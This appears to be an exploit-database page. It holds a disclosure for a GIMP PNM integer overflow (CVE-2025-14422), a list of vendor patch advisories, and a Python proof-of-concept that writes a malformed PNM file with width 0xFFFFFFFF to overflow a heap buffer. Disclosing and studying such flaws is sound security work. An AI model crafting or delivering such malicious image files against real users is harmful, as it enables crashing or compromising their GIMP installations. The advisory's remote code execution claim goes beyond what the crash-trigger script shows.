| Reporter | Title | Published | Views | Family All 129 |
|---|---|---|---|---|
| Amazon Linux 2 : gimp, --advisory ALAS2GIMP-2026-010 (ALASGIMP-2026-010) | 22 Jan 202600:00 | – | nessus | |
| AlmaLinux 9 : gimp (ALSA-2026:0914) | 26 Jan 202600:00 | – | nessus | |
| AlmaLinux 8 : gimp:2.8 (ALSA-2026:1574) | 29 Jan 202600:00 | – | nessus | |
| Debian dla-4431 : gimp - security update | 2 Jan 202600:00 | – | nessus | |
| Debian dsa-6093 : gimp - security update | 4 Jan 202600:00 | – | nessus | |
| MiracleLinux 9 : gimp-3.0.4-1.el9_7.2 (AXSA:2026-085:01) | 27 Jan 202600:00 | – | nessus | |
| MiracleLinux 8 : gimp:2.8 (AXSA:2026-106:01) | 30 Jan 202600:00 | – | nessus | |
| openSUSE 16 Security Update : gimp (openSUSE-SU-2026:20100-1) | 26 Jan 202600:00 | – | nessus | |
| Oracle Linux 9 : gimp (ELSA-2026-0914) | 21 Jan 202600:00 | – | nessus | |
| Oracle Linux 8 : gimp:2.8 (ELSA-2026-1574) | 29 Jan 202600:00 | – | nessus |
=============================================================================================================================================
| # Title : GIMP PNM Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://redhat.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214572/ & CVE-2025-14422
[+] Summary : This discussion centers on a critical security vulnerability discovered in GIMP (GNU Image Manipulation Program),
specifically within its PNM (Portable Anymap) file parsing logic. The flaw, identified as CVE-2025-14422,
is an Integer Overflow that occurs when the application processes malformed image headers containing excessively large dimensions.
[+] Key Technical Details:
The Flaw: When calculating the memory buffer size (Width×Height×3), the result exceeds the maximum value for a 32-bit integer, causing it to "wrap around" to a very small number.
The Impact: GIMP allocates an undersized buffer based on the overflowed value. When it proceeds to write the actual pixel data from the file into this buffer, a Heap-based Buffer Overflow occurs.
Risk: This vulnerability allows for Remote Code Execution (RCE). An attacker can execute arbitrary code in the context of the current user simply by tricking them into opening a malicious .pnm file.
Mitigation: Red Hat and other Linux vendors have released urgent patches (e.g., RHSA-2026:1591). Users must update GIMP to the latest version to close this security gap.
[+] PoC Overview
The provided Python script serves as a Proof of Concept to demonstrate the vulnerability. It generates a .pnm file with:
A standard P6 header.
Width set to 0xFFFFFFFF to trigger the mathematical overflow.
A payload of 5,000 bytes to ensure the undersized buffer is overwhelmed.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
def create_malicious_pnm(filename):
header = b"P6\n"
width = 0xFFFFFFFF
height = 2
header += f"{width} {height}\n".encode()
header += b"255\n"
payload = b"A" * 5000
try:
with open(filename, 'wb') as f:
f.write(header)
f.write(payload)
print(f"[+] Malicious PNM file created successfully: {filename}")
print("[*] WARNING: Do not open this file unless in an isolated test environment.")
except Exception as e:
print(f"[-] Failed to create file: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 poc.py <filename.pnm>")
sys.exit(1)
create_malicious_pnm(sys.argv[1])
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation